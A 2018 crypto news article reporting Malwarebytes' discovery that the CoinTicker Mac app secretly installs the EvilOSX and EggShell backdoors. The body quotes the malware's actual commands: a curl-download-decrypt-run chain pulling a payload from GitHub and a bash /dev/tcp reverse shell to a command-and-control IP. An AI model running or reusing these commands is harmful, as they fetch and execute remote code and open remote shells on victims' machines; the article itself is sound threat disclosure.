• Crypto
    • Bitcoin News
    • Ethereum
    • Altcoin
    • Blockchain
    • Blockchain Companies
    • Cryptocurrency Exchanges
    • DeFi
    • Regulation
    • Press Release
    • ICO News
      • ICOs Review
      • Upcoming ICOs
      • Scam
  • Education
    • CryptoTicker Starter Kit
    • Blockchain For Dummies
    • Crypto entrepreneurs
    • Free Resources
    • Events
    • Events Review
  • Prices
  • Exchange Comparison
  • NFT
  • Newsletter subscription

  • News

    • Bitcoin News
    • Altcoin
    • Regulation
    • Blockchain Companies
    • Blockchain
    • Cryptocurrency Exchanges
  • News

    • Ethereum
    • Events Review
    • ICO News
    • Press Release
  • Education

    • CryptoTicker Starter Kit
    • Education
    • Blockchain For Dummies
    • Crypto entrepreneurs
    • Free Resources
    • Events
  • Cryptoticker

    • About us
    • Cryptoticker business
    • Advertise
    • Media Kit
    • Submit your Press Release
    • We write for you
    • Contact
    • Membership Login
  • Social Media

    Facebook
    Twitter
    Telegram
    Youtube
    • Newsletter
Starter Kit Membership
  • Crypto
    • Bitcoin News
    • Ethereum
    • Altcoin
    • Blockchain
    • Blockchain Companies
    • Cryptocurrency Exchanges
    • DeFi
    • Regulation
    • Press Release
    • ICO News
      • ICOs Review
      • Upcoming ICOs
      • Scam
  • Education
    • CryptoTicker Starter Kit
    • Blockchain For Dummies
    • Crypto entrepreneurs
    • Free Resources
    • Events
    • Events Review
  • Prices
  • Exchange Comparison
  • NFT
Starter Kit Membership
English
English Deutsch
Search Menu
Search


CoinTicker Crypto Tracking App Installs Backdoors On Mac Computers

Posted On October 31, 2018 1:02 pm Prasanna 0

Bitcoin
Trade Bitcoin now

CoinTicker, a Mac menu-bar app that presents the latest prices of many cryptocurrencies is installing two backdoors on Mac computers. According to a blog from the Malwarebytes, a forum contributor, 1vladimir, observed that an application called CoinTicker had been installing backdoors onto computer systems after download.

The CoinTicker App Behaviors

The blog further explained that the CoinTicker app, at first seems a reliable application that could likely be beneficial to people who have invested in cryptocurrencies. Once downloaded, the app presents an icon in the menu bar that gives data about the current price of Bitcoin. The app’s options enable the user to modify the display, displaying data about a broad class of cryptocurrencies, such as Bitcoin, Etherium, and Monero.

This functionality appears to be verifiable but in reality, the app is actually installing two backdoors known as EvilOSX and EggShell. These backdoors easily avoid requests for authentication to root because of the apps legitimate behavior. When users launch this app then it downloads and installs parts of two different open-source backdoors: EvilOSX and EggShell. The app performs the following shell command to download a custom-compiled version of the EggShell server for macOS:

nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc; openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq; python /tmp/.info.py

The initial section of the command downloads an encoded file from a Github page relating to a user named “youarenick” and stores that file to a secret file called .info.enc in /private/tmp/. After that, it uses OpenSSL to decode that file into a secret Python file called .info.py. Eventually, it produces the resulting Python script.

The .info.py script executes varied jobs. First, it starts a reverse shell link to a command & control server, using the following command:

nohup bash &> /dev/tcp/94.156.189.77/2280 0>&1

The blog further explained that the hacker’s purpose behind this app is not yet discovered. The malware is spread through a cryptocurrency app, however, it appears likely that the malware is expected to gain access to users’ cryptocurrency wallets for the goal of lifting coins.

This app was plausibly never valid because the app is distributed via a domain named coin-sticker.com. This domain was just registered a few months ago on July 13.

About EvilOSX and EggShell

EvilOSX is a malware posted on GitHub that gives hackers a profoundly customizable attack tool that runs on any old or newer versions of macOS. The project can be downloaded by anyone. It is a remote access trojan, a program that can be utilized to spy on a MacOs user by obtaining things like the system’s webcam, microphone, and screenshot service. It also enables hackers to download personal files without the victim’s knowledge.

EggShell is a post-exploitation malware written in Python language. It provides users a command line concourse with additional functionalities. It also gives attackers the power and ease of uploading/downloading files, tab completion, getting pictures, location tracking, shell command execution, persistence, escalating privileges, password retrieval, and much more.

The post concluded that the fascinating thing about CoinTicker is that it only requires normal user permissions. Root permissions are not required. There is usually an inaccurate over-emphasis on malware’s requirement for root privileges, but this malware is a classic illustration that malware does not need such privileges to have a high potential for risk.

Just a few days ago, The McAfee Labs Threat Report for the month of September 2018 found that malware that involves in cryptocurrency mining using PC’s resources is doubled in Q2 2018 with an 85% increase. McAfee’s research also found that there was an increase in malware attacks targeted at mobile devices. A growing trend for mobile adoption has been noticed across the sector as both CoinMarketCap and Binance Info have released apps for users to access market data on mobile devices. The new Zcash (ZEC) ‘Sapling’ update will reduce the computational power needed for its encryption algorithm zk-SNARKS, which will make mobile transactions using phones a reality.

The notoriety and developing the real-world importance of cryptocurrencies are also attracting cybercriminal attention. Crypto mining malwares are software created to illegally mine cryptocurrency, has nearly doubled in the second quarter of the year, and perpetrators could be building malware explicitly for targeting mobile devices.

Follow us on Twitter, Facebook, Steemit, and join our Telegram channel for the latest blockchain and cryptocurrency news

Trading Bitcoin is too complicated?

We highly recommend our Crypto-Starter-Kit to you! 

Or are you looking for the current Bitcoin Price in USD? Look no further!
Bitcoin Price, Ethereum Price, Ripple Price  

 

Follow us on Social Media and subscribe to our free crypto newsletter!

@Telegram
@Instagram
@Twitter 
@TikTok
@Facebook

Diskutiere mit uns!

About Trading @CT Trader
About Crypto in general @CT Inside

This post may contain promotional links that help us fund the site. When you click on the links, we receive a commission - but the prices do not change for you! :)

Disclaimer: The authors of this website may have invested in crypto currencies themselves. They are not financial advisors and only express their opinions. Anyone considering investing in crypto currencies should be well informed about these high-risk assets.

Trading with financial products, especially with CFDs involves a high level of risk and is therefore not suitable for security-conscious investors. CFDs are complex instruments and carry a high risk of losing money quickly through leverage. Be aware that most private Investors lose money, if they decide to trade CFDs. Any type of trading and speculation in financial products that can produce an unusually high return is also associated with increased risk to lose money. Note that past gains are no guarantee of positive results in the future. 

Scam

  • share 
  • share 
  • share 
  • tweet 
  • share 


You might also like

Scam

Crypto Malware found in Adobe Flash Player Updates
October 16, 2018
Scam

Q2 2018 Sees an 85% Increase in Crypto Malware Attacks
September 27, 2018
Blockchain For Dummies Education

A Technical Breakdown Of The Lazarus Group MacOS Malware Hack
August 24, 2018
Crypto

Cryptojacking Malware Grew By 629% Says McAfee
June 29, 2018
Crypto

Telecom Egypt is Secretly Redirecting Egyptian Internet Users to Mine Cryptocurrency
March 22, 2018
Crypto

Telegram Zero-Day Vulnerability Used By Hackers To Spread Cryptocurrency Miner.
February 14, 2018
Crypto

Malware attacks SCADA network to mine cryptocurrency
February 12, 2018

More from Scam

N*GGER COIN? Blockfolio Hacked, sends offensive messages! This is what you need to know
Posted On February 10, 2021 Robert Weiss 0

Earlier today the cryptocurrency management application, Blockfolio was hacked. The attacker sent several extremely offensive messages to many users. No …

Crypto Wallet Provider Ledger Hacked: Data Leak Results in Phishing Scams
Posted On December 22, 2020 Prasanna 0

Ledger, a cryptocurrency wallet provider has encountered a data breach. The official Twitter account of the hardware wallet tweeted that …

China Police Took Down More Than $4.2 Billion Crypto Assets from PlusToken Ponzi Scam
Posted On November 27, 2020 Prasanna 0

According to a new court judgment, China police have seized crypto assets worth more than $4.2 billion from the PlusToken Ponzi …

In order to support and motivate the CryptoTicker team, especially in times of Corona, to continue to deliver good content, we would like to ask you to donate a small amount. Independent journalism can only survive if we stick together as a society. Thank you


  • Top Broker

    Plus500
    Plus500
    Visit · Review
    Skilling
    Skilling
    Visit · Review
    Skilling
    eToro
    Visit

    Top Exchanges

    PrimeXBT
    Prime XBT
    Visit · Review
    Bybit
    bybit
    Visit · Review
    Kraken
    Kraken
    Visit · Review
    Coinbase
    Coinbase
    Visit · Review
    FTX
    FTX
    Visit



  • News

    • Bitcoin News
    • Altcoin
    • Regulation
    • Blockchain Companies
    • Blockchain
    • Cryptocurrency Exchanges
  • News

    • Ethereum
    • Events Review
    • ICO News
    • Press Release
  • Education

    • CryptoTicker Starter Kit
    • Education
    • Blockchain For Dummies
    • Crypto entrepreneurs
    • Free Resources
    • Events
  • Cryptoticker

    • About us
    • Cryptoticker business
    • Advertise
    • Media Kit
    • Submit your Press Release
    • We write for you
    • Contact
    • Membership Login
  • Social Media















    Newsletter


  • Imprint
  • Privacy Policy
  • Non-liability Disclaimer
©2021 CryptoTicker

Share

Share stories you like to your friends